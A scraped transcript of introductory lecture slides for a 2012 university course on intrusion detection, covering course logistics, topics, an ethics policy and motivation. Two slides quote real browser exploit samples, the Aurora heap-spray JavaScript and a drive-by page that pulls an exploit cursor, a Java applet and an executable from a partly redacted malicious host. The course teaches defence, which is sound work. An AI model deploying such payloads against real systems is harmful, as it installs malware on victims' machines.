Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... ·...
-
Upload
nguyentuyen -
Category
Documents
-
view
214 -
download
0
Transcript of Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... ·...
![Page 1: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/1.jpg)
ISA 674 Intrusion Detection
Angelos Stavrou, George Mason University!
Introduction & Class Mechanics!
![Page 2: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/2.jpg)
Course Mechanics
¨ Course URL:!¤ http://cs.gmu.edu/~astavrou/isa674_F12.html!
¨ Instructor ! !Angelos Stavrou!¤ Email: ! ! [email protected]!¤ Office: ! ! !Research I, rm 437!¤ Office Phone: ! !(703) 993-3772!¤ Office Hours: ! !Wednesday 4:30 – 6:30pm"
! ! ! !and by appointment!
![Page 3: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/3.jpg)
Course Mechanics
¨ Course URL:!¤ http://cs.gmu.edu/~astavrou/isa673_S10.html!
¨ TA! ! ! Rahul Murmuria!¤ Email: ! ! [email protected]!¤ Office: ! ! Engineering building CS TA Room!¤ Office Hours: ! Monday, 4:00 – 6:00pm!
![Page 4: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/4.jpg)
Course Bibliography
Required: "The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy, Patrick Engebretson, "Publication Date: August 4, 2011 "Available by:[GMU Bookstore] [Amazon]""Data Mining and Machine Learning in Cybersecurity, "Sumeet Dua and Xian Du, Publication Date: "April 25, 2011 Available by: [GMU Bookstore] [Amazon]!
!Recommended: "
Practical Intrusion Analysis: Prevention and Detection for the Twenty-First Century, Ryan Trost, Publication Date: June 24, 2009"Available by:[Online through Safari] [Amazon]!
![Page 5: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/5.jpg)
Grading
¨ Homework: 30%!¨ Midterm: 15%!¨ Final Class Projects: 35% !¨ Class Participation: 5%!¨ No Final Exam!!!!!
This class is an upper-level class and is geared towards understanding the fundamental concepts behind Intrusion Detection for Computer systems. !!!
The students will be expected to participate in large projects under the guidance of the instructor. "!
![Page 6: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/6.jpg)
Course Overview
¨ Provide hands-on experience with fundamentals and advanced topics in Intrusion Detection!
¨ Intrusion Detection techniques: !n Honeypots, Logging, Monitoring,!n System Auditing – Network and Host!n Signature – based systems: Snort, BRO, Suricata, ArcSight!n Anomaly Detection and Data Mining!n Advanced Topics: Peer-to-peer Botnets, Advanced
Persistent Threats, Drive-by-Downloads !
¨ Recent advanced techniques such as host-based intrusion detection, system randomization, vulnerability fingerprinting, and combination of Network and Host .!
![Page 7: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/7.jpg)
Prerequisites
¨ Courses!¤ ISA 656 and ISA 562 ; or permission of instructor. The
coursework will include substantial hands-on projects; in order to be able to complete the projects, the students must be comfortable with using tools and Unix."!
¨ Skills!¤ Familiar or comfortable with Linux!¤ Scripting and configuration of tools!¤ Willingness to spend time in the lab learning about
exploits, defenses, and tools.!¤ Being able to install programs and work in Unix!
![Page 8: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/8.jpg)
Course Topics (tentative)
¨ Introduction Intrusion Detection!¤ Lure the attacker to you: Honeypots and Honeyclients.!¤ Basic Intrusion Detection Mechanisms!
¨ Understanding the Threats Malware Taxonomy!¤ Remote Attacks – perform one on your own!¤ Advanced Persistent Threats (ATP): use content!¤ After the attack what: RootKits, Back-Doors, Botnets!¤ Setting up Defenses: Network & Hosts!!
¨ Post Attack Recovery: "Logging, Auditing, and Data Restoration !¤ Log Generation!¤ Log Auditing!¤ Log-based Recovery!
![Page 9: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/9.jpg)
Course Topics (tentative)
¨ Passive Network Intrusion Detection!¤ Snort, Bro, Suricata, ArcSight!¤ Host Intrusion Detection!¤ TripWire and Memory Randomization!!
¨ Vulnerability Analysis Vulnerability Classification!¤ Defense against Known Vulnerabilities!¤ Defense against Unknown (0-day) Vulnerabilities!
!
![Page 10: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/10.jpg)
Course Topics (tentative)
¨ Malware Capture and Analysis !¤ Honeypot Taxonomy!¤ Recent Honeypot Advances!¤ Deployment and Liabilities!
¨ Malware!¤ Polymorphic Malware!¤ Malware Packers and Javascript Encoders!¤ Analyzing Malware with PIN & IDA Pro!
¨ Rootkits Rootkit Basics!¤ Advanced Rootkit Techniques!¤ Rootkit Defenses!
![Page 11: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/11.jpg)
Course Schedule (Tentative)
!
¨ Please check it at least twice in a week!!
http://cs.gmu.edu/~astavrou/isa674_F12.html#Schedule
![Page 12: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/12.jpg)
Course Policies
¨ Academic integrity!¤ If you do not cite it and you use it, you are in violation!!¤ Please read!!
¨ Unless otherwise noted, work turned in should reflect your independent capabilities!¤ If unsure, note / cite sources and help!
¨ Usually, no late submissions will be accepted!¤ No penalty for documented emergency (e.g., medical) or by
prior arrangement in special circumstances!
![Page 13: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/13.jpg)
Warning
¨ Policy on security experiments:!¤ you may not break into machines that are not
your own; !¤ you may not attempt to attack or subvert system
security on machines not owned by you. !
![Page 14: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/14.jpg)
ISA 674 Intrusion Detection
Introduction!
![Page 15: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/15.jpg)
Motivation
¨ Internet malware remains a top threat:!
![Page 16: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/16.jpg)
Types of Attacks
¨ Drive-By Malware!¨ Application Attacks!¨ Attacks enabled by
access to passwords!
¨ Heap-Spray Attacks!¨ Denial of service!¨ Spoofing!¨ E-mail attack!¨ Wireless attacks!¨ Malware and Malfese!¨ Malware Embedded
Objects!
![Page 17: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/17.jpg)
Google Aurora Attack 2010 <html><script>var sc = unescape("%u9090%u19eb%u4b5b%u3390%u90c9 […]”); var sss = Array(826, 679, … 875); var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i < 200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){ e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 50); } function ev2(){ p = “ \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d"; for (i = 0; i < x1.length; i ++ ){ x1[i].data = p; } ; var t = e1.srcElement; } </script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></body></html>
![Page 18: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/18.jpg)
Similar Code Injection Examples
![Page 19: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/19.jpg)
q One Click on a malicious URL Q http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html
q Result:
MS04-013
MS03-011
MS05-002
<html><head><title></title></head><body> <style> * {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")} </style> <APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1> <PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET> <script> try{ document.write('<object data=`ms-its: mhtml:file: //C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+ 'm::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>'); }catch(e){} </script> </body></html>
An Attack Incident Against IE Browser
![Page 20: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/20.jpg)
22 “unwanted” programs are installed without the user’s consent
An Attack Incident Against IE Browser
![Page 21: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/21.jpg)
21
URL-level Topology Graph for WinXP SP1 Un-patched: 688 URLs from 270 sites
Topology Graph of Malicious URLs
Site nodes
URLs
Content Provider Exploit Provider
Redirecting URL
Exploiting URL
![Page 22: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/22.jpg)
Motivation
![Page 23: Introduction & Class Mechanics - George Mason …astavrou/courses/ISA_674_F12/ISA_674... · Introduction & Class Mechanics! Course Mechanics ! ... the fundamental concepts behind](https://reader032.fdocuments.in/reader032/viewer/2022022607/5b81d6fb7f8b9aad638d4064/html5/thumbnails/23.jpg)
Course Focus
¨ Understanding essential techniques behind these attacks offensively and defensively !
¨ Hands-on Exercises: your own working IDS!!